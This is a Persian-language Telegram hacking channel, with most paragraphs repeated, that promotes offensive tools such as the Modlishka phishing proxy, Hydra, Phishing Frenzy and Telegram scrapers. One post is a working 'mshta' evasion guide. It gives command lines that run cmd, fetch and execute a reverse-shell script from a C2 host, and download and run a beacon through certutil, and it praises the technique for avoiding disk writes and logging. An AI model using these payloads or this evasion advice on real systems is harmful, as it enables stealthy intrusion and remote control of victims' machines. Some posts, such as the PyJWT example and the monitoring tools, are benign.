👩💻 Modlishka
🔺؛Modlishka به شما امکان میدهد از یک پروکسی HTTP معکوس خودکار استفاده کنید. کاربر همچنین میتواند از این ابزار برای "مسموم کردن" خودکار حافظه پنهان (کش) مرورگر با استفاده از کد وضعیت HTTP 301 استفاده کند. علاوه بر این، میتوان از آن برای جمعآوری آدرسهای URL که از TLS استفاده میکنند، بهره برد. Modlishka از اکثر روشهای احراز هویت چند عاملی پشتیبانی میکند و میتواند آسیبپذیریهای مربوط به 2FA (احراز هویت دو مرحلهای) را شناسایی و برجسته کند.
⬅️ لینک به GitHub
🔺؛Modlishka به شما امکان میدهد از یک پروکسی HTTP معکوس خودکار استفاده کنید. کاربر همچنین میتواند از این ابزار برای "مسموم کردن" خودکار حافظه پنهان (کش) مرورگر با استفاده از کد وضعیت HTTP 301 استفاده کند. علاوه بر این، میتوان از آن برای جمعآوری آدرسهای URL که از TLS استفاده میکنند، بهره برد. Modlishka از اکثر روشهای احراز هویت چند عاملی پشتیبانی میکند و میتواند آسیبپذیریهای مربوط به 2FA (احراز هویت دو مرحلهای) را شناسایی و برجسته کند.
⬅️ لینک به GitHub
t.me/Hack4Man
❤2🔥2
👩💻 Hydra
🔺هیدرا ابزاری است که امکان انتخاب خودکار نام کاربری و رمز عبور را برای تعداد زیادی از سرویسهای شبکه فراهم میکند. این ابزار از مجموعهای گسترده از پروتکلها پشتیبانی میکند، به طور انعطافپذیری برای سناریوهای مختلف قابل تنظیم است و اغلب برای بررسی امنیت اطلاعات کاربری در محیطهای آزمایشی استفاده میشود. علاوه بر این، هیدرا برای خودکارسازی حملات به سرویسهایی که از احراز هویت پایه استفاده میکنند، مناسب است.
⬅️ لینک گیتهاب
🔺هیدرا ابزاری است که امکان انتخاب خودکار نام کاربری و رمز عبور را برای تعداد زیادی از سرویسهای شبکه فراهم میکند. این ابزار از مجموعهای گسترده از پروتکلها پشتیبانی میکند، به طور انعطافپذیری برای سناریوهای مختلف قابل تنظیم است و اغلب برای بررسی امنیت اطلاعات کاربری در محیطهای آزمایشی استفاده میشود. علاوه بر این، هیدرا برای خودکارسازی حملات به سرویسهایی که از احراز هویت پایه استفاده میکنند، مناسب است.
⬅️ لینک گیتهاب
t.me/Hack4Man
❤6
🔒 بلکبیرد (Blackbird)
👁 یک ابزار OSINT برای جستجوی ردپاهای دیجیتال بر اساس نام کاربری و آدرس ایمیل در شبکههای اجتماعی.
بلکبیرد، حسابها را در بیش از 600 پلتفرم جستجو میکند، و با ترکیب بررسی در دسترس بودن پروفایلها، فیلتر کردن نتایج و تحلیل خودکار، کارایی بالایی دارد. این ابزار از خروجی دادهها در قالبهای PDF و CSV پشتیبانی میکند و همچنین از هوش مصنوعی برای پروفایلسازی اطلاعات یافتشده، مستقیماً از خط فرمان، استفاده میکند.
❗️ این ابزار برای متخصصان OSINT، محققان امنیت و تحلیلگران، برای خودکارسازی جمعآوری اطلاعات عمومی، بسیار مناسب است.
📱 گیتهاب (GitHub)
برچسبها: #ابزارها #هک #امنیت
👁 یک ابزار OSINT برای جستجوی ردپاهای دیجیتال بر اساس نام کاربری و آدرس ایمیل در شبکههای اجتماعی.
بلکبیرد، حسابها را در بیش از 600 پلتفرم جستجو میکند، و با ترکیب بررسی در دسترس بودن پروفایلها، فیلتر کردن نتایج و تحلیل خودکار، کارایی بالایی دارد. این ابزار از خروجی دادهها در قالبهای PDF و CSV پشتیبانی میکند و همچنین از هوش مصنوعی برای پروفایلسازی اطلاعات یافتشده، مستقیماً از خط فرمان، استفاده میکند.
❗️ این ابزار برای متخصصان OSINT، محققان امنیت و تحلیلگران، برای خودکارسازی جمعآوری اطلاعات عمومی، بسیار مناسب است.
📱 گیتهاب (GitHub)
برچسبها: #ابزارها #هک #امنیت
t.me/Hack4Man
❤2👍2
🕷؛TGSpyder: ابزاری OSINT برای جمعآوری دادهها از تلگرام
یک ابزار خط فرمان (CLI) برای تحلیلگران، روزنامهنگاران و محققان. این ابزار، اعضا، پیامها، لینکهای دعوت و فرادادهها را از گروهها/کانالهای عمومی و خصوصی جمعآوری میکند. تمام اطلاعات به فرمت CSV خروجی داده میشوند تا تجزیه و تحلیل آنها آسانتر باشد.
قابلیتها:
جمعآوری لیست اعضا (در صورت امکان)
خروجی گرفتن از تاریخچه پیامها
استخراج و حذف لینکهای تکراری t.me
جستجوی کاربر بر اساس نام کاربری یا شناسه (ID)
تعیین سازنده بستههای استیکر بر اساس شناسه (ID) مجموعه استیکرها
⚙ نحوه نصب:
⚙ نحوه استفاده اولیه:
خروجی: تمام دادهها در پوشهای به نام TGSpyder Output/ ذخیره میشوند و بر اساس پوشهها و زمانبندی مرتب شدهاند.
🔗 گیتهاب
یک ابزار خط فرمان (CLI) برای تحلیلگران، روزنامهنگاران و محققان. این ابزار، اعضا، پیامها، لینکهای دعوت و فرادادهها را از گروهها/کانالهای عمومی و خصوصی جمعآوری میکند. تمام اطلاعات به فرمت CSV خروجی داده میشوند تا تجزیه و تحلیل آنها آسانتر باشد.
قابلیتها:
جمعآوری لیست اعضا (در صورت امکان)
خروجی گرفتن از تاریخچه پیامها
استخراج و حذف لینکهای تکراری t.me
جستجوی کاربر بر اساس نام کاربری یا شناسه (ID)
تعیین سازنده بستههای استیکر بر اساس شناسه (ID) مجموعه استیکرها
⚙ نحوه نصب:
bash
git clone https://github.com/Darksight-Analytics/tgspyder.git
cd tgspyder
pip install -r requirements.txt
pip install -e .
⚙ نحوه استفاده اولیه:
bash
tgspyder https://t.me/examplegroup --members --chats
tgspyder --user @username
tgspyder --sticker-pack https://t.me/addstickers/packname
خروجی: تمام دادهها در پوشهای به نام TGSpyder Output/ ذخیره میشوند و بر اساس پوشهها و زمانبندی مرتب شدهاند.
🔗 گیتهاب
t.me/Hack4Man
❤4
🤖 ؛PentAGI: سیستم چندعاملی برای تست نفوذ خودکار
🔺این ابزار از عاملهایی مبتنی بر GPT، Claude یا DeepSeek برای انجام تست نفوذ استفاده میکند. این عاملها با ابزارهای موجود در Kali Linux (بیش از 20 ابزار) کار میکنند، خود تصمیمگیری میکنند و وظایف را انجام میدهند.
⚙ قابلیتها:
معماری چندعاملی: عوامل مختلف مسئولیتهای مختلفی مانند جمعآوری اطلاعات، اسکن و بهرهبرداری را بر عهده دارند.
استفاده از ابزارهای Kali (مانند Nmap، Metasploit، Hydra و غیره) از طریق تصاویر Docker.
مدلهای کنترلی: GPT، Claude، DeepSeek (قابل انتخاب).
رابط کاربری گرافیکی زیبا + مانیتورینگ از طریق Grafana/Prometheus.
امکان مشاهده فعالیتهای عوامل به صورت زنده.
🔗 GitHub: PentAGI
🔺این ابزار از عاملهایی مبتنی بر GPT، Claude یا DeepSeek برای انجام تست نفوذ استفاده میکند. این عاملها با ابزارهای موجود در Kali Linux (بیش از 20 ابزار) کار میکنند، خود تصمیمگیری میکنند و وظایف را انجام میدهند.
⚙ قابلیتها:
معماری چندعاملی: عوامل مختلف مسئولیتهای مختلفی مانند جمعآوری اطلاعات، اسکن و بهرهبرداری را بر عهده دارند.
استفاده از ابزارهای Kali (مانند Nmap، Metasploit، Hydra و غیره) از طریق تصاویر Docker.
مدلهای کنترلی: GPT، Claude، DeepSeek (قابل انتخاب).
رابط کاربری گرافیکی زیبا + مانیتورینگ از طریق Grafana/Prometheus.
امکان مشاهده فعالیتهای عوامل به صورت زنده.
🔗 GitHub: PentAGI
t.me/Hack4Man
🔥3❤2👍1
💡ترفند: mshta - ایجاد یک شل معکوس از طریق برنامه HTML
🔺فکر میکنید mshta.exe فقط برای اجرای فایلهای .hta استفاده میشود؟ خندهدار است، اما نه. این یک فایل اجرایی مخفی ویندوز است که میتواند جاوااسکریپت و VBScript را مستقیماً از حافظه اجرا کند. این فایل توسط مایکروسافت امضا شده است، به ندرت مسدود میشود و حتی زمانی که PowerShell غیرفعال است، کار میکند. بریم سراغش!
🔺؛mshta چه قابلیتهایی دارد (و چرا این موضوع عالی است)
1⃣ اجرای اسکریپت از حافظه بدون فایل روی دیسک
این دستور cmd.exe را اجرا میکند و whoami را اجرا میکند. بدون ایجاد فایل، بدون ثبت رویداد در Event Viewer، مستقیماً از حافظه.
2⃣ ایجاد یک شل معکوس (بدون ذخیره روی دیسک)
🔺این اسکریپت را از حافظه دانلود و اجرا میکند. PowerShell، اگر با -ExecutionPolicy Bypass اجرا شود، در تاریخچه ثبت نمیشود.
3⃣ دانلود بار مفید از یک سرور از راه دور
🔺ترکیب mshta و certutil به شما امکان میدهد یک فایل را بدون استفاده از PowerShell دانلود و اجرا کنید.
🔺فکر میکنید mshta.exe فقط برای اجرای فایلهای .hta استفاده میشود؟ خندهدار است، اما نه. این یک فایل اجرایی مخفی ویندوز است که میتواند جاوااسکریپت و VBScript را مستقیماً از حافظه اجرا کند. این فایل توسط مایکروسافت امضا شده است، به ندرت مسدود میشود و حتی زمانی که PowerShell غیرفعال است، کار میکند. بریم سراغش!
🔺؛mshta چه قابلیتهایی دارد (و چرا این موضوع عالی است)
1⃣ اجرای اسکریپت از حافظه بدون فایل روی دیسک
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("cmd.exe /c whoami",1,true);close()این دستور cmd.exe را اجرا میکند و whoami را اجرا میکند. بدون ایجاد فایل، بدون ثبت رویداد در Event Viewer، مستقیماً از حافظه.
2⃣ ایجاد یک شل معکوس (بدون ذخیره روی دیسک)
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("powershell -c IEX(New-Object Net.WebClient).DownloadString('http://c2.com/rev.ps1')",0,true);close()🔺این اسکریپت را از حافظه دانلود و اجرا میکند. PowerShell، اگر با -ExecutionPolicy Bypass اجرا شود، در تاریخچه ثبت نمیشود.
3⃣ دانلود بار مفید از یک سرور از راه دور
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("certutil -urlcache -split -f http://c2.com/beacon.exe beacon.exe && beacon.exe",0,true);close()🔺ترکیب mshta و certutil به شما امکان میدهد یک فایل را بدون استفاده از PowerShell دانلود و اجرا کنید.
t.me/Hack4Man
❤5
؛Phishing Frenzy — یک چارچوب برای حملات فیشینگ
🔺؛Phishing Frenzy یک ابزار قدرتمند و متنباز است که برای ایجاد و مدیریت کمپینهای فیشینگ طراحی شده است.
🔺این ابزار، تمام عملکردهای لازم را برای خودکارسازی حملات فیشینگ در اختیار کاربران قرار میدهد، از جمله ایجاد وبسایتهای جعلی، ارسال ایمیلهای فیشینگ و ردیابی نتایج حملات.
📌لینک گیت هاپ
🔺؛Phishing Frenzy یک ابزار قدرتمند و متنباز است که برای ایجاد و مدیریت کمپینهای فیشینگ طراحی شده است.
🔺این ابزار، تمام عملکردهای لازم را برای خودکارسازی حملات فیشینگ در اختیار کاربران قرار میدهد، از جمله ایجاد وبسایتهای جعلی، ارسال ایمیلهای فیشینگ و ردیابی نتایج حملات.
📌لینک گیت هاپ
t.me/Hack4Man
📦 کتابخانه روز: PyJWT — کار با توکنهای وب JSON
؛JWT یک استاندارد برای انتقال امن دادهها بین طرفین است. PyJWT یک کتابخانه برای ایجاد و اعتبارسنجی این توکنها است.
نصب:
مثال: ایجاد و بررسی توکن:
# 1. ایجاد توکن
# 2. بررسی توکن
؛JWT یک استاندارد برای انتقال امن دادهها بین طرفین است. PyJWT یک کتابخانه برای ایجاد و اعتبارسنجی این توکنها است.
نصب:
pip install pyjwtمثال: ایجاد و بررسی توکن:
import jwt
import datetime
SECRET_KEY = "your-secret-key"
# 1. ایجاد توکن
payload = {
"user_id": 123,
"username": "alex",
"exp": datetime.datetime.now(datetime.UTC) + datetime.timedelta(hours=1)
}
token = jwt.encode(payload, SECRET_KEY, algorithm="HS256")
print(f"توکن: {token}")# 2. بررسی توکن
try:
decoded = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
print(f"سلام، {decoded['username']}!")
except jwt.ExpiredSignatureError:
print("توکن منقضی شده است")
except jwt.InvalidTokenError:
print("توکن نامعتبر است")
t.me/Hack4Man
❤3
📊یک ترمینال، مانیتورینگ مستقل را ارائه میدهد – نیازی به اجرای برنامههایی مانند htop، iotop، nethogs و df نیست.
🛡یک رابط کاربری مبتنی بر متن (TUI) برای مانیتورینگ سیستم، نوشته شده با زبان Rust: دارای 6 تب با نمودارها برای CPU (هر هسته به صورت جداگانه)، حافظه، دیسکها، شبکه، دما و باتری؛ قابل اجرا در سیستمعاملهای Linux، macOS و Windows.
🔺تب Processes: نمایش ساختار درختی فرآیندها با قابلیت فیلتر و مرتبسازی بر اساس هر پارامتر + امکان خاتمه دادن به فرآیندها مستقیماً از طریق رابط کاربری.
🔺تب Disk: نمودارهای تعاملی از میزان استفاده دیسکها با قابلیت نمایش تاریخچه.
🔺تب Network: نمودارهای سرعت شبکه در لحظه با قابلیت بزرگنمایی زمانی.
📥 لینک به گیتهاپ
📌قابلیت سفارشیسازی در سطح تمها، ویجتها و فرکانس بهروزرسانی. از ماوس پشتیبانی میشود.
🛡یک رابط کاربری مبتنی بر متن (TUI) برای مانیتورینگ سیستم، نوشته شده با زبان Rust: دارای 6 تب با نمودارها برای CPU (هر هسته به صورت جداگانه)، حافظه، دیسکها، شبکه، دما و باتری؛ قابل اجرا در سیستمعاملهای Linux، macOS و Windows.
🔺تب Processes: نمایش ساختار درختی فرآیندها با قابلیت فیلتر و مرتبسازی بر اساس هر پارامتر + امکان خاتمه دادن به فرآیندها مستقیماً از طریق رابط کاربری.
🔺تب Disk: نمودارهای تعاملی از میزان استفاده دیسکها با قابلیت نمایش تاریخچه.
🔺تب Network: نمودارهای سرعت شبکه در لحظه با قابلیت بزرگنمایی زمانی.
📥 لینک به گیتهاپ
📌قابلیت سفارشیسازی در سطح تمها، ویجتها و فرکانس بهروزرسانی. از ماوس پشتیبانی میشود.
t.me/Hack4Man
❤2
🛡؛PatchMon: مدیریت متمرکز بهروزرسانیها در محیطهای سرور
🔺این ابزار برای مدیران سیستم و تیمهای امنیتی طراحی شده است و امکان مدیریت ایمن و متمرکز بهروزرسانیها را در سرورهای مختلف فراهم میکند. عوامل (agents) فقط از طریق کانالهای خروجی با سرور PatchMon ارتباط برقرار میکنند، بنابراین نیازی به باز کردن پورتها و مواجهه با خطرات امنیتی نیست.
قابلیتها:
🔗 GitHub: PatchMon/PatchMon
🔺این ابزار برای مدیران سیستم و تیمهای امنیتی طراحی شده است و امکان مدیریت ایمن و متمرکز بهروزرسانیها را در سرورهای مختلف فراهم میکند. عوامل (agents) فقط از طریق کانالهای خروجی با سرور PatchMon ارتباط برقرار میکنند، بنابراین نیازی به باز کردن پورتها و مواجهه با خطرات امنیتی نیست.
قابلیتها:
مدیریت متمرکز پچها در تعداد زیادی سرور
عوامل از طریق اتصالات خروجی کار میکنند (بدون نیاز به پورتهای باز)
نمایش کامل وضعیت بهروزرسانیها
خودکارسازی ایمن فرآیندها
🔗 GitHub: PatchMon/PatchMon
t.me/Hack4Man
❤3